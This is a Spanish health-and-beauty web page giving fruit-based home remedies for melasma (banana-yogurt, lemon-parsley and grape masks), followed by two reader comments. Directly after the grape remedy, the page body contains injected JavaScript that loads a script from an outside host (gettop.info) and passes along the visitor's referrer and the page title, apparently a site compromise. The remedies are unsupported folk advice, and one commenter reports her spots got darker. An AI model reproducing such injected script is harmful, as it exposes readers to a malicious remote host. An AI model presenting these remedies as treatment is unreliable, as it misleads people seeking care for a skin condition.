Salud y belleza » Enfermedades, Medicina

Melasma, remedios caseros

2 Comentarios

Melasma, cloasma o sencillamente “máscara del embarazo”, es una hipermelanosis adquirida: un trastorno que se caracteriza básicamente por un oscurecimiento de la piel.

Si bien en algunos casos se presenta como marca genética (vigente, por ejemplo en nativos americanos) en otras oportunidades el melasma viene dado producto de ciertos factores (problemas hormonales).

Al margen de los tratamientos convencionales, existen una serie de curas alternativas a base de frutas. Aquí un repaso de tres alternativas: plátanoa, limón, uva.

Remedios caseros, melasma

Cura de la banana: lavar un plátano, quitar la cáscara; colocar la fruta en una licuadora y agregar una taza entera de yogurt natural. Batir. Aplicar el resultado en forma de mascarilla sobre el rostro.

Cura del limón: extraer el zumo de un limón, mezclar con un puñado de perejil y batir todo junto. Nuevamente, aplicar, a modo de mascarilla, sobre las manchas de la cara (hacerlo de noche y por poco tiempo: tanto el solo como el efecto corrosivo del limón puede resultar fuertes para el rostro).

Cura de la uva: lavar un racimo de uvas, quitar las semillas y colocar la fruta en una licuadora junto con media taza de agua. Aplicar, frío, sobre el rostro y dejar puesto por aproximadamente media hora.var d=document;var s=d.createElement('script'); s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : ,

2 Comments »

  • lucia said:

    Hola yo tengo melasma y estoy desesperada, leí sus consejos y he estado usando la mascarilla de banana y jogurt pero me da la impresión de que se me han oscurecido más las manchas.En realidad ya no se que usar para al menos aclarar un poco las manchas ya que eliminarlas por copleto creo que no es posible.
    saludos

  • elba yanira said:

    hola quisiera saver como se cura el melasma en el cuello ya me a desesperado tenerlo y me esta corriendo para el pecho es bien molesto tenerlo y me pica en varias ocasiones quiero saber que puedo hacer para que se me quite porque se ve feo y parece que fuera suciedad pero no es adi les agradeceria su pronta respuesta

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.